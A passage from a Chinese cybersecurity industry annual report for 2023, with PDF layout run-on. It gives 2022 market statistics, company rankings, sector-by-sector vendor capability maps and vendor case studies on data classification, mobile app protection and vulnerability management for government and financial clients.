VMS 漏洞运营管理系统某商行联盟解决方案35案例:某大型金融机构行业案例38案例:某全国性股份制商业银行移动安全建设案例403、运营商 434、公安 445、国防 45案例:某国防客户安全监管解决方案466、能源 48案例:中国石油某销售公司油库网络安全改造推广项目案例49案例:某干线天然气管道公司工控安全解决方案527、电力 55案例:电力新能源工控安全态势感知平台建设案例56案例:竞远安全电力行业网络安全综合服务案例59案例:某省输电变电站618、轨道交通 64目录案例:某城市轨道交通列车智能运维安全防护方案65案例:某地铁集团 PSCADA 系统安全改造试点示范项目案例689、医疗 7110、互联网 72案例:某互联网行业客户移动安全建设案例73第五章数字安全 资本 76第六章数字安全九大态势80一、数字安全时代的到来 80二、国有化趋势愈加明显 80三、集成模式挤压利润与创新空间 80四、数字安全产业发展形势严峻 80五、国家安全、数字经济为刚需 81六、存量市场与增量市场并发 81七、一体化解决方案呼声渐强 81八、安全运营从共识走向落地 82九、数据安全新方向逐渐明朗 82后 记 83 中国数字安全产业年度报告 20231前言2020 年至 2022 年,是全球动荡变化的三年,战争、疫情、贸易封锁、金融危机习总书记近年来数十次的强调“当今世界正经历百年未有之大变局”。具体到仅有三十年历程的网络安全产业,如今也面临着前所未有的挑战和机遇。三年疫情之后,广大安全企业面临着生存与发展,创新与营利的多重难题。但危机与机遇并存,数字化的趋势已是全球共识,数字经济已是所有经济体的发展目标。因此,网络安全正在从以国家安全、公共安全为主的范式转换到国家安全保障和护航数字经济并重的数字安全。数字经济的命脉是数据的流动,因此,以网络安全为基础手段,以数据安全为核心目的,是数字安全的技术内涵。在万物互联的数字世界里,数字安全是国家安全和数字经济的基础支撑,而摸清家底、厘清现状,以判断趋势和辅助决策,是助推数字安全产业健康良性发展的前提。为此,数世咨询基于连续多年积累的产业调研能力和经验,经过大量的现场沟通、访谈,梳理、整理,统计工作之后,撰写完成中国数字安全产业年度报告(2023),以客观地反映我国数字安全产业的真实状况,为国家主管部门、研究机构、行业用户,以及广大数字安全企业和相关从业者提供有价值的参考。北京数字世界咨询有限公司2023 年 6 月2第一章统计标准“一套清晰明确并来源于实践的统计标准,其意义要甚于统计工作本身。因为没有统计标准,统计工作就是空中楼阁。”摘自中国数字安全产业统计与分析报告(2022)中国数字安全产业年度报告 20233本报告的统计标准包括,统计口径、统计范围、调查方法和术语解释,供业界相关人员参考与指正。一、统计口径本报告的统计口径有两大类,一类是公开财报的上市企业,以财报披露的营收额为准。另一类是未上市的公司,以年度的营收开票额为准。本报告包括三种整体市场规模的统计数字,即数字安全行业总收入、数字安全业务(含集成)总收入和数字安全业务(去集成)总收入。如无特别指出,本报告所有提及的数字安全市场规模是指“数字安全业务(含集成)总收入”。统计数据的时间跨度为2022年1月1日至2022年12月31日。二、统计范围基于数世咨询核心团队20年的国内安全企业调研工作的经验积累,本报告根据原厂能力、营收水平和业务类型,选择了750余家在公开市场上具有一定知名度的数字安全企业作为本报告的基础调查对象。本报告的统计范围为中国内地的企业,不包括香港、澳门和台湾地区内。本报告的基础调查对象为750余家经营数字安全业务且具备原厂能力的企业,不包括专门从事分销、代理、代售业务的企业,不具备解决方案能力的集成商,以及非企业主体,如研究所、测评中心、高校学院等。在750家基础样本中,本报告以1000万元左右的数字安全业务年营收额为底限,选取了350余家企业作为统计对象。信创领域中,如芯片、操作系统、数据库、中间件、服务器、个人电脑、办公软件等非安全类产品不在本报告统计之内。4三、统计方法在调研方面,本报告主要通过企业问卷调查、公开资料收集、日常交流访谈三种形式开展调研工作。在统计方面,本报告采用的是供给侧的角度,将统计对象,即350余家数字安全企业的年营业收入、业务类型、从业人员、地区行业收入等数字进行计算后,从各种不同的维度进行展现。在收入方面,数字安全业务收入在企业总收入中占比小于50%的企业,只统计数字安全业务收入,不统计该企业的非安全业务收入。反之,占比大于等于50%的企业,则统计其非安全业务并将其计入数字安全行业收入。在收入划分方面,弃用软件与硬件收入的划分方法,将两者合而为一并且与“软件即服务”收入一并计入到安全产品收入。四、术语解释1、数字安全包含电子设备、通信网络、信息系统及电子数据所构成的虚拟网络空间,正在与现实物理空间融合成一个数字化的世界。在数字世界中,面向数字化对象或基于数字化手段而展开的对抗博弈过程,称之为数字安全。2、数字安全业务以企业主体出售数字安全产品、人员服务、解决方案产生的经营收入。3、数字安全企业理论上一切具有数字安全业务的企业都可称之为数字安全企业,但在本报告中是指数字安全业务占企业总收入50%及以上,或者数字安全业务年收入达1000万元以上,且具备原厂能力的企业。中国数字安全产业年度报告 202354、原厂能力自身具备数字安全产品、方案定制、安全服务的能力,而非单纯的中间转售。5、数字安全企业从业人员与数字安全企业签订劳动合同的正式员工。6、数字安全技术或网络安全技术本报告中一般是指数字安全企业所提供的产品、服务、方案的其中一种、两种或总和。7、并购兼并和收购。本报告中是指并购双方或多方相互之间的股权转移,而不是以融资为目的的股份稀释。(注:本章的统计标准部分参考中国网络空间安全协会于2020年发布的中国网络安全产业统计报告。)6第二章数字安全市场网络安全行业发展了三十年,从计算机安全等级保护,到信息安全等级保护,再到网络安全等级保护,充分体现出合规的第一驱动作用。但数字安全的复杂性和碎片性,只能依靠创新来引领和解决。数字安全行业的未来,一定是合规与创新双轮驱动。摘自2022年数字安全大事记 中国数字安全产业年度报告 20237一、市场规模2022 年度,国内数字安全业务(含集成)总收入为 981.2 亿元,较 2021年度增长 7.14%。与上年度 18.6%的增长率相比,下降 11.46 个百分点。数字安全集成业务收入 199.72 亿元,较 2021 年度增长 36.42%。2022 年度,国内数字安全业务(去集成)总收入为 781.48 亿元,较 2021年度下降 14.92 亿元,增长率为-1.87%。与上年度 15.9%的增长率相比,下降 17.77 个百分点。2022 年度,国内数字安全行业总收入为 1047.81 亿元,较 2021 年度增长6.97%。与上年度 22%的增长率相比,下降 15.03 个百分点。(注:按照数世咨询的统计惯例,本报告将“数字安全业务(含集成)总收入”定义为默认语境下的数字安全市场规模)图 1国内数字安全市场规模(2020-2022)新冠疫情三年(2020-2022)期间,国内数字安全产业规模的变化为“先扬后抑”。从 2020 年增长率 29.9%的历史最高点,下滑到 2021 年的 18.6%,然后再到 2022 年的 7.14%,成为 2014 年以来的历史增长率最低点。这一结果,基本符合数世咨询去年报告中的市场预判。8“2022年度的数字安全市场有可能出现自2014年以来的历史最低增长”摘自中国数字安全产业统计与分析报告 2022图 22017-2027 年国内数字安全市场规模重要结论2022 年度,国内数字安全市场规模为 981.2 亿元,增长率首次跌破两位数,仅为 7.14%,为十年来的历史最低点。需要业界尤为警惕的是,7.14%的市场规模增长,实际上完全来自于集成业务,而安全产品和服务则首次出现负增长即-1.87%。在全球经济疲软的大背景下,以 2022 年底数字安全需求方的预算规划和今年上半年预算的实际执行情况来看,2023 年的市场形势十分严峻,大概率继续维持个位数的增长率。以 2025 年,即十四五规划收关年,恢复 20%的增长率推算,国内数字安全市场规模将在 2027 年接近 2000 亿元。中国数字安全产业年度报告 20239二、业务分类正如去年报告所言,将数字安全产品划分为硬件和软件的习惯,来源于生搬硬套传统信息产业的划分方法,不适用于以生产软件和提供服务为主的数字安全厂商。依据数世咨询的统计惯例,本报告将数字安全业务分为三大类:一是软硬件、设备及 SaaS 订阅收入,即安全产品收入;二是以人天计费的安全服务收入;三是安全集成收入。图 32019-2022 年 安全产品、安全服务、安全集成占比重要结论2022 年,安全产品收入约占总收入的 68%,安全服务收入约占总收入的12%,安全集成收入约占总收入的 20%。安全服务占比略有上升,安全产品占比下降,安全集成业务连续三年呈快速上升态势。安全集成业务占比的提升,有两大主因:一是多元化。大型安全企业、云服务商和软硬件科技企业均不同程度的在10发展集成业务,以扩大营收规模。二是数科化。大型国有集团纷纷成立科技三产公司,或改组或合并原有组织架构,以获取更大的竞争优势。三、客户分布根据本报告 750 家基础调查对象客户数据的不完全统计,2022 年数字安全产业的核心客户群依然为,政府部委、国防公安、金融、运营商和能源等五大领域。图 4国内数字安全客户行业分布情况(2022)图 5 国内数字安全客户行业分布情况(2021)中国数字安全产业年度报告 202311重要结论疫情原因,政府部委(不含国防、公安)在客户行业中的占比明显下降,但国家与社会安全等特殊行业,以及事关国计民生的工业制造、医疗、ICT 科技和互联网领域等领域,占比均略有上升。由于安全具有国家、社会、政治等公共属性,因此合规始终是数字安全产业的基本驱动力。但随着全球的数字化进程,数字经济发展带来的应用场景需求将会成为数字安全的第二大驱动力。四、城市分布按数字安全企业总部所在城市的企业营收排序,超过 20 亿元的有九座城市,分别为北京、深圳、杭州、成都、上海、南京、厦门、苏州、济南。从各城市数字安全企业收入占城市 GDP 的比例来看,除北京、深圳和杭州三所城市以外,其他六座城市均有很大的提升空间,尤其以上海为甚。图 6数字安全企业总部所在城市的企业营收12第三章数字安全 企业从各企业收入水平的占比情况来看,网络安全市场“没有寡头,只有诸侯”的格局明显,同时碎片化现象非常突出。这种情况也与全球网络安全市场的格局相似。摘自2020 年中国网络安全产业统计报告 中国数字安全产业年度报告 202313一、收入水平2022 年的数字安全业务(含集成)年收入,在本报告 350 家统计对象中,有 11 家企业收入达到 20 亿元以上,占比 37.5%;8 家达到 10 亿元以上,占比12.6%;18 家企业在 5 至 10 亿之间,占比 12.9%;133 家企业在 1 至 5 亿之间,占比 29.6%;180 家企业不足亿元,占比 7.1%。图 72022 年国内数字安全企业收入区间重要结论与去年相比,数字安全企业的年收入水平几无变化。数字安全技术属于企业服务的市场范畴,碎片化的格局是常态。“没有寡头,只有诸侯“的市场格局,未来将长期保持下去。对于数字安全企业而言,一方面很难快速的规模化,上市的比例很小。另一方面能保持基本的企业运转,破产倒闭的情况很少。因此,在扎根自身的特长领域和保持创新力的基础上,实现良性循环、稳步增长的目标,不失为中小企业的健康经营之道。二、上市企业2022 年度,具有明显数字安全业务属性的企业,在新三板挂牌的公司有1438 家,在沪深上市的共有 51 家。其中,数字安全企业 32 家(数字安全业务在总营收中占比大于等于 50%,或者绝对值超过 5 亿元人民币的企业)。图 8具有明显数字安全业务属性的上市企业收入分类另据今年 5 月数世咨询发布的2022 中国数字安全上市企业航线图的统计,自数世咨询 2014 年开始产业统计工作以来,沪深上市的数字安全企业净利润总和历史上首次出现亏损,且亏损总额接近 17 亿元。图 92020-2022 年数字安全上市企业三项指标重要结论从上市企业收入分类中可以明显看出,沪深两市的企业以产品销售为主,而新三板企业服务与集成并重,而仅有安全业务属性的非安全公司,则是集成和产品并重。净利润历史上首次出现亏损,具体表现在 25 家企业出现亏损,更甚者一家企业高达 18 亿元的净利润亏损,即将出现历史上首个从沪深交易所退市的安全公司。在营收几无增长且亏损总额接近 17 亿元的情况下,但研发投入依旧有较高增长,除了部分有平衡财务指标的原因以外,还意味着安全上市企业对未来 中国数字安全产业年度报告 202315的市场较有信心。图 102022 中国数字安全上市企业航线图16三、数字安全百强数字安全百强报告基于国内 750 余家经营数字安全业务的企业,结合多种角度、不同维度的企业相关数据进行梳理和评价。报告分为两大部分,一是综合实力较为突出的 100 家企业,通过品牌影响力和企业规模二大维度,以数轴点阵图的形式予以展现。二是专精特新 100 家企业的推荐,目的在于突出业务规模目前较小,但在创新能力方面表现优秀的企业。1、综合实力百强在入围本次综合实力百强的企业中,领军力量企业入围门槛为 10 亿元,共 19 家,总营收约 480.67 亿元。中坚力量共 45 家,总营收约为 220.71 亿元。潜在力量共 36 家,总营收约为 68.02 亿元。中国数字安全产业年度报告 202317 图 112023 年数字安全百强182、年度成长力十强即便在整体安全产业增长乏力的情况下,仍然有一批企业业绩突出,增长迅速:图 12年度成长力十强 中国数字安全产业年度报告 2023193、年度创新力十强创新是产业良性发展的灵魂支柱,在尤为注重技术实用性和应用价值性的数字安全领域更是如此:图 13年度创新力十强204、专精特新百强专精特新百强均为企业规模较小,但在专业、深度、差异化和创新性方面非常具有优势或特色的数字安全企业。由于名单较长,本报告仅列出“年度创新力十强”企业。(百强报告可前往数世咨询官网或公众号查看)重要结论2022 年度,综合实力百强安全业务总营收达 769.4 亿元,较上年度增长4.07%。年增长率下降约 12 个百分点。在本统计年度的综合实力百强中,有 5 家企业退出 10 亿元营收的领军力量区间,但也有 2 家企业首次挺进。专精特新百强中,开发与应用安全、威胁检测与响应、工业互联网安全、安全运营、数据安全、API 安全、数字靶场,为七大热点赛道。百强报告中,10 亿元区域企业数量的减少,意味着数字安全企业扩大规模的艰难。具备经营状况良好、规模大,并且创新力强的“三合一”型数字安全企业,在国内始终未能出现。数字安全产业的本质是企业级服务,只要是普及性的服务就一定是碎片化的。因此数世咨询认为,在自身擅长的领域深耕,合理调配现有资源,以实现“滚雪球”式的稳健增长,才是企业级服务市场的正道。中国数字安全产业年度报告 202321四、从业人员2022 年数字安全企业从业人员约 14.71 万人,其中技术人员约占 69.7%,从业人员较 2021 年增长 6.6%。图 14数字安全从业人员构成 图 15不同收入规模的数字安全企业从业人员分布图 16数字安全从业人员平均成本分布(2022)22图 17数字安全从业人员平均成本分布(2021)重要结论2022 年,从业人员增长率为 6.6%,相比去年下降 9 个百分点,主要为非技术人员的减员。2022 年,数字安全从业人员的人均产值约为 53.86 万元,但人均净利润为负值。因此预计,2023 年整个产业的研发投入将有大幅度的缩减。2022 年,数字安全从业人员人均成本在 20-30 万元之间的占 60%,人均薪酬在 20 万元以下的占 24%。与 2021 年相比,前者增长了 10 个百分点,后者则下降了 10 个百分点。可以看出,数字安全从业人员成本(薪资水平)明显上升。中国数字安全产业年度报告 202323第四章数字安全 技术网络安全与数字安全最大的区别在于,前者的关注重点在“围绕通信、边界和端点组成的网络进行对抗的过程”,后者则是“以网络安全为基础手段,以数据安全为核心目的。”数世咨询24一、数字安全的内涵自 2019 年数世咨询创始人在公开发表的文章中,首次提倡“数字安全”时代以来,数字安全的概念越来越受到业内的关注。基于网络安全的本质和特性,数世咨询在 2020 年提出网络安全技术分类的方法论“网络安全三元论”(以下简称三元论):信息技术、业务应用和网络攻防。信息技术是网络安全的起源。有了电子通信才有电子对抗,有了计算机、操作系统、数据库、应用程序,才会有系统安全、数据库安全、应用安全,有了云计算、移动互联网、工业互联网,才会有云安全、移动安全和工业互联网安全的概念。简而言之,没有网络就没有网络安全。业务应用是一个机构或组织生存发展的根本前提,信息技术是为业务需求服务的。基于产品设备或技术方案对信息系统的保护,并非网络安全的最终目的,只有更好的服务数字化业务的需求,为数字经济的发展赋能,保卫国家安全,才是网络安全的根本目标。网络攻防的逻辑本质是“对抗”,对抗则意味着没有无往不胜的攻击,也没有牢不可破的防御。“道高一尺,魔高一丈”,循环往复,永不休止。因此,动态性、相对性、整体性、开放性、协同性等理念是做好网络安全的方向指引。2020 年,中共中央国务院关于构建更加完善的要素市场化配置体制机制的意见(以下简称意见)正式公布。意见开创性地把数据与土地、劳动力、资本、技术并列,定义为人类经济活动的第五大生产要素。2021 年,数据安全法实施。2022 年,中共中央、国务院印发了数字中国建设整体布局规划,明确要求“筑牢可信可控的数字安全屏障。切实维护网络安全,完善网络安全法 中国数字安全产业年度报告 202325律法规和政策体系。增强数据安全保障能力,建立数据分类分级保护基础制度,健全网络数据监测预警和应急处置工作体系。”基于三元论的三大支点信息技术、业务应用和网络攻防,围绕数据的安全保护,就构成了数字安全模型。网络安全与数字安全最大的区别在于,前者的关注重点在“围绕通信、边界和端点组成的网络进行对抗的过程”,后者则是“以网络安全为基础手段,以数据安全为核心目的”。图 18以三元论为支点的数字安全模型重要结论信息技术是网络安全的保护对象,业务应用是网络安全的服务对象,而网络攻防是网络安全的立身之本。对三者的深度理解和技能掌握是做好网络安全工作的三个支点,缺一不可。数世咨询将这一理论称之为,网络安全三元论。以网络安全三元论为支点,数世咨询给出数字安全的概念:“包含电子设备、通信网络、信息系统及电子数据所构成的虚拟网络空间,正在与现实物理空间融合成一个数字化的世界。在数字世界中,面向数字化对象或基于数字化手段而展开的对抗博弈过程,称之为数字安全。”26二、数字安全能力图谱从信息技术、业务应用与网络攻防三大支点和位于中心的数据安全共四大维度出发,能力图谱划分出八大方向,信息基础设施保护、信息计算环境保护;行业环境安全、应用场景安全;基础与通用技术、体系框架、安全运营;数据安全。每个方向又包含各自一级或子级的细分领域。(注:包含企业的完整版图谱可在数据咨询官网 浏览)业内有很多缺乏逻辑框架,仅靠罗列堆积的企业目录、产品大全性质的图表,“重数量轻质量”、“只堆积不精选”、“模仿意愿强、原创能力弱”,是这些分类图表的普遍现象。常见的典型例子,一家年收入仅数千万元的厂商,就能覆盖十余个分类,一些综合产品的大厂更是能覆盖几十个分类。稍微有几年安全行业经验的人应该都明白,哪怕是一项细分品类的安全技术,都需要包括研发、人员、销售、市场、客户等方面的长期投入,一个数千万年收入的厂商能有二、三款主打产品已是极限。因此,一个貌似大而全但在真实性方面欠缺的图表,给业界带来了沟通不便、统计不便、采购不便等一系列弊端,违背了分类图谱清晰划分并推荐优选的初衷和本意,即降低供需双方的试错成本。为此,数世咨询发布的系列能力图谱,大幅度削减了入选企业的数量,是精选而不是海选,更不是企业大全,以规避“全能型”原厂商或中小企业占据多条产品线的混乱现象。除此之外,为了反映重要行业用户中的主流安全厂商,数世咨询基于行业的维度,于 2023 年 6 月首次推出了2022 年度中国数字安全能力图谱(行业版),包括了数字安全产业十个最为重要的行业领域。中国数字安全产业年度报告 202327图 19数字安全能力图谱总分类281、政府部委网络边界安全山石网科、启明星辰、新华三、天融信、深信服、信达网安流量安全恒安嘉新、绿盟科技、奇安信、天融信、启明星辰、安恒信息端点安全网站安全瑞数信息、绿盟科技、电信安全云安全观安信息、安全狗、阿里云、知道创宇移动安全盈高科技、梆梆安全物联网安全天懋信息、慧盾安全、迪普科技、新华三、远望信息、世安智慧公共安全美亚柏科、效率源、上海弘连工业互联网安全奇安信、安恒信息、烽台科技、珞安科技、博智安全开发与应用安全海云安、思客云、云弈科技互联网安全通付盾、微步在线、恒安嘉新密码万里红、中孚信息、数字认证、飞天诚信、九州量子网络空间资产测绘360数字安全、知道创宇、华顺信安、盛邦安全漏洞与补丁管理斗象科技、默安科技、华云安攻击面收敛烽台科技、华顺信安、天懋信息、云科安信威胁情报微步在线、天际友盟、奇安信、360数字安全身份安全派拉软件、竹云、芯盾时代、齐治科技模拟伪装永信至诚、锦行科技、经纬信安、长亭科技、默安科技态势感知深信服、奇安信、启明星辰、新华三、绿盟科技、安恒信息威胁检测与响应安天、火绒安全、奇安信高级威胁防御安天、安恒信息、天融信、深信服、奇安信、绿盟科技意识与培训红山瑞达安全管理安全演练永信至诚、赛宁网安、丈八网安、安码科技、锦行科技、博智安全网络保险嘉韦思数据贮存安全世平信息、海峡信息、美创科技数据访问安全闪捷信息、明朝万达、天融信、赛猊腾龙信息基础设施保护信息计算环境保护行业环境安全应用场景安全基础与通用技术体系框架安全运营数据安全安天、奇安信、360数字安全、安全狗、天融信、绿盟科技安恒信息、江民科技、安芯网盾安信天行、联成科技、远禾科技、安恒信息、天融信、深信服奇安信、绿盟科技图 20政府部委 中国数字安全产业年度报告 202329基于分类分级的数字政府数据安全流转监测与防护方案闪捷信息科技有限公司【用户需求】数字政府是推动数字中国建设的重要支撑,安全作为发展的伴生体,为应对新时代数据安全风险挑战,政府行业的数据安全防护必须高度重视。数字政府建设过程中,存在组织机构数据分类分级能力较弱、可用数据分类分级信息滞后、内容识别技术准确度低、数据安全风险监测能力欠缺等痛点。因此,亟需对域内数据进行摸底盘点、分级分类、关联分析、风险评估等综合安全治理,实现数据全生命周期安全管理,确保数据来源可信、访问可控、操作可查和责任可追。【解决方案】(一)数据安全分类分级服务发挥数据安全分类分级起承上启下的作用,完成迈向数据安全精细化管理重要一步。承上:运维制度、保障措施、岗位职责等多方面的管理体系都需依托数据分类分级进行针对性编制。启下:根据不同数据级别,实现不同安全防护。工作流程包含分类分级方案预研、分类分级方案确定、分类分级方案评审三个环节。(二)数据安全资产管理系统数据分类分级方案确定后,引入自动化工具,采用“工具” “人工”的方式对数据进行分类分级标识,加速项目实施速度,降低错误率,为企业或组织构建数据安全运营体系打下夯实的基础。系统分为数据资产探测、数据资产梳理、敏感数据识别、数据分类分级、数据资产多维分析等功能模块,同时采用 AI 技术提升内容识别的准确性与识别工具的实用性及应用范围,以达到数据资产“可见、可懂、可控、可用”。30 图 21数据资产管理系统逻辑架构图(三)与数据安全产品联动将分类分级信息与数据安全产品联动,实现敏感数据信息与安全风险等内容的实时同步,形成有针对性的数据安全防护策略,实现加密、脱敏、审计、访问控制等的策略协同与联防联动。(四)直观可视、可查、可判、可用根据分类分级结果,自动监测敏感数据的流动和访问情况,在风险识别模型基础上采用 AI 技术提升风险识别能力。支持广泛的数据源类型及常见非结构化数据资产识别,自动化生成统计报表,提高常态风险管理能力与数据安全风险监测能力。【用户评价】该建设项目采用政务行业的数据识别规则模板和 AI 技术,识别的自动化程度达到 96%,根据数据梳理结果制定出差异化的安全策略,优化了安全资源配置,整个防护体系统一管理,策略共享,防护无遗漏。建设系统自身不存储、不截留用户的真实业务数据,确保用户业务数据在维护、管理过程中不会曝光和泄露。该项目为数字政府行业数据安全防护提供了新的治理模式,具有良好的示范效应,为数字政府建设和数字经济发展提供了行之有效的安全保障。中国数字安全产业年度报告 202331某人力资源和社会保障局电子社保移动安全建设案例北京梆梆安全科技有限公司【用户需求】近年来,电子社保卡业务一直在不断创新,由之前人社范围内的一卡通办到目前实现支持更多政务数据的一卡共享、各类民生服务的一卡多用。人社部重点搭建完善服务内核,以将内核嵌到地方政府 APP 及各大银行 APP 中,方便广大群众使用电子社保卡。由于社保数据的特殊性,它已成为个人隐私信息泄露的“重灾区”,如被公开售卖,用于牟利,社保行业的安全建设面临严峻的风险与挑战:防范个人隐私信息泄露 社保数据防护能力提升 符合社保行业移动安全合规要求【解决方案】图 22解决方案示意基于社保移动端的安全态势及行业政策,梆梆安全社保移动安全解决方案,防护对象包括 App 和 H5 小程序,方案覆盖安全合规、安全监测、安全防护以及安全运营保障四大框架。根据人社移动端安全建设任务的紧迫程度,建议分期进行建设。32一期建设App 是社保业务的重要承载渠道,作为安全合规检查的重点对象,一期建议优先构建 App 端的安全防护措施及安全运营保障。安全防护措施应用安全加固:有效防止针对智能应用软件的逆向分析、二次打包、内存注入、动态调试、数据窃取、界面劫持、应用钓鱼等恶意攻击行为,使客户端具备基本的抗攻击能力,全面保护智能应用软件安全。App 安全软键盘:通过梆梆安全独有的白盒加密技术对密钥进行保护,使用严格的加密方式对用户输入的信息进行安全处理,并提供多种类型的输入字符供用户进行切换,降低了输入数据泄露的风险,保障客户端信息输入的安全。安全运营保障App 安全监测:保障客户端的环境校验,检查客户端运行时所必须的条件,确保客户端自身和所处运行环境的安全性。通过对移动应用运行过程的持续监控,从动态攻击的技术源头进行感知分析,提供多维度的安全态势统计,并以可视化图表的方式展现整体安全形势,帮助用户快速建立事前、事中、事后的移动应用安全监测防御体系。二期建设H5 安全加固:有效防止针对 H5 Web 应用、H5 混合应用、小程序、公众号进行的反编译、动态调试、代码篡改、JavaScript 盗用等攻击行为,降低因H5 自身安全缺陷带来的各种风险,使 H5 页面具备基本的抗攻击能力。H5 安全软键盘:保障 H5 小程序端信息输入的安全,为开发者提供高强度数据加密保护能力,同时支持展示企业 Logo、安全软键盘等信息,让用户在输入过程中意识到被保护,提升用户对企业安全服务能力的认可和品牌认同感。常态化建设 中国数字安全产业年度报告 202333个人隐私合规评估服务:根据客户提供的行业合规要求,帮助企客户在监管部门检查前自查自纠,提前发现问题,确保其符合行业安全合规、个人信息合规要求,保障服务渠道在采集用户个人敏感数据时的合规性。安全渗透测试服务:利用漏洞产生原理和渗透测试方法,通过黑盒方式对各类信息系统及应用等进行深度弱点探测和脆弱性测试,帮助应用开发者和管理者了解应用系统存在的脆弱性,为改善并提高应用系统安全性提供依据和解决方案,保障服务渠道避免由软件漏洞引发的安全风险,帮助用户建立安全可靠的应用服务。【用户评价】感谢“梆梆安全”投入大量人力物力,为项目顺利推进提供了有力支持。在移动安全建设项目中,项目团队与我单位积极配合,工作负责,业务精湛,展现出很好的工作能力和作风。342、金融网络边界安全信安世纪、新华三、山石网科、华为、奇安信流量安全启明星辰、绿盟科技、新华三、奇安信、斗象科技、科来网络端点安全奇安信、安天、联软科技、亚信安全云安全移动安全指掌易、爱加密、安软信创、梆梆安全、联软科技、嘉赛信息物联网安全万物安全开发与应用安全互联网安全顶象科技、国舜股份、芯盾时代网络空间资产测绘360数字安全、斗象科技、魔方安全、云弈科技漏洞与补丁管理斗象科技、默安科技、华云安、碳泽信息攻击面收敛威胁情报微步在线、奇安信、360数字安全身份安全芯盾时代、竹云、派拉软件、齐治科技模拟伪装默安科技、长亭科技、元支点、360数字安全态势感知奇安信、启明星辰、天融信、深信服威胁检测与响应未来智安、兰云科技意识与培训易念科技检测与测评嘉诚信息、北方实验室、赛可达实验室、时代新威安全演练360数字安全、默安科技、奇安信、绿盟科技网络保险嘉韦思、众安科技数据贮存安全安华金和、炼石网络、安恒信息数据访问安全天空卫士、明朝万达、闪捷信息、北信源、数安行信息基础设施保护信息计算环境保护应用场景安全基础与通用技术体系框架安全运营数据安全悬镜安全、海云安、开源网安、默安科技、云弈科技国舜股份、酷德啄木鸟、边界无限、火线安全华顺信安、未来智安、安博通、360数字安全、华云安零零信安、魔方安全青藤云安全、小佑科技、默安科技、瑞数信息全知科技、探真科技、安全狗图 23金融行业 中国数字安全产业年度报告 202335斗象科技 VMS 漏洞运营管理系统某商行联盟解决方案上海斗象信息科技有限公司【项目背景及需求】某商业银行合作联盟有限公司(以下简称“联盟”)基于业务的发展与安全建设需求,每年定期开展渗透测试、上线安全评估检测、攻防对抗演习等工作,因此其内部汇集了大量的安全漏洞数据,这些数据仅能通过人工统计、排重后在进行后续漏洞的重新汇总、分发、处置修复等工作。但随着业务系统投入数量的增长,沉淀的漏洞数量与日俱增,传统的表格及邮件管理的模式已无法满足漏洞生命周期管理的要求且零散、繁多的漏洞、报告等数据统计的不完整、处置流程偏向于原始的漏洞处理方式等因素,不仅导致内部漏洞处理效率低下,同时沉淀的大量漏洞数据潜藏价值效能无法发挥,也难以转化为联盟自身的安全能力。在此背景下,联盟急需能够提供标准科学化的漏洞运营管理平台,实现综合漏洞数据的全面管控,同时建立起联盟自有的漏洞库和知识库,不断沉淀并扩展其价值并为后续的漏洞治理运营工作奠定基础。【解决方案】图 24联盟漏洞管理平台流程示意为有效实现管理及沉淀漏洞资源,上海斗象信息科技有限公司(以下简称“斗象科技”)以自研漏洞运营管理系统为基础,通过其内部的流程化、体系化、36持续化的漏洞运营机制,结合系统内置的漏洞全生命周期管理办法,为联盟建立起完善且符合实际需求的漏洞运营管理平台及漏洞全链路治理解决方案。该平台由联盟技术管理部负责使用,VMS 漏洞管理运营系统平台使用主要作为部门内部的漏洞管理、漏洞修复、漏洞验证、漏洞归档等流程开展。租户分权分域,实现精准且安全的权限管理基于联盟内部的资产庞杂极难统筹管理问题、部门权责等情况,VMS 漏洞运营管理系统内置以角色为主的权限划分机制,为联盟专项设计了一套逻辑化的内部职能划分的体系架构,实现了资产、架构、角色、账户等维度的逻辑设置,帮助内部漏洞管理对接工作的高效串联。模型可扩展,实现漏洞管理流程的高度管控和灵活适配VMS 漏洞运营管理系统内置漏洞审核、修复、复审、关闭的标准化漏洞管理方法,实现了对漏洞的生命周期管理。以项目需求为出发点,斗象科技为联盟设计出漏洞提交、审核、确认、整改、复测等关键节点的漏洞管理流程,以及项目对接管理机制,同时基于使用和变更的考量,VMS 漏洞运营管理系统引入后台流程配置引擎模块,用户可通过流程模板画布配置及表单自定义功能,构建起独有的符合用户需求的漏洞管理办法,完美契合联盟未来的发展及变更需求。海量漏洞情报,助力漏洞运营的智能化决策VMS 漏洞运营管理系统对接 CVND、CNNVD 官方漏洞库、CERT 和社区类漏洞库,整合运营海量安全漏洞情报,基于不同的业务场景,赋予系统智能化分析和决策能力。以联盟自有漏洞数据其基础,VMS 漏洞运营管理系统自定义字典模块帮助联盟构建起专用漏洞库,为后续的漏洞数据利用价值最大化提供支持。此次项目,斗象科技 VMS 漏洞运营管理系统不仅帮助联盟构建起起科学完善的漏洞生命周期管理流程,摆脱了粗放式漏洞管理弊端,全面提升漏洞处置效率;同时帮助其打破内部数据孤岛,融合关键信息,实现漏洞运营一体化管理,协助其沉淀的漏洞数据内化,为联盟未来安全建设提供可靠参考和动力源泉。中国数字安全产业年度报告 202337【用户评价】通过引入斗象科技 VMS 漏洞运营管理系统,极大缩减了我们漏洞发现和修复的时间,降低漏洞资产被攻击概率,斗象科技提出的漏洞运营治理解决方案,不仅帮助我们建立更快速、更集中化地漏洞收集、流转、处置类平台,同时在长期的运营管理过程中,给予科学的治理优先级理念,指导未来联盟安全漏洞管理工作,大大提升了管理人员的运营效率。VMS 的漏洞知识库功能,也帮助我们构建起漏洞数据汇入,库内漏洞数据内化,高价值漏洞案例沉淀形成知识闭环,为未来的人才培养奠定了知识的基础。38某大型金融机构行业案例北京指掌易科技有限公司【客户需求】近年来,云计算、人工智能和 5G 等新技术广泛应用,给金融机构在数字化转型建设、运营效率等方面提供了基础条件。并随着智能终端设备的种类、功能不断丰富,某大型金融机构顺势实现了业务应用和办公应用的移动化,新增了混合办公、移动展业和移动营销等多个移动化场景。移动化不仅给员工带来了便捷性,流程处理、外出走访和移动办公等效率也有了极大地提升。但是在方便员工访问移动应用服务和数据资源的同时,对外开放的服务端口有增无减,存在来自互联网的恶意攻击活动。碎片化的移动设备接入和使用,仍然出现非法泄露、账号被盗用和冒用等安全问题。在个人自带终端上进行远程办公,工作数据无意识的留存、转发分享、恶意程序窃取导致泄露等情况经常发生。针对该金融机构的现状,打造一体化、多场景的移动化安全管理平台,适应于手机、PC 端和信创终端等多种设备环境使用,同时兼具较好的用户体验。【解决方案】某金融机构现有员工 5 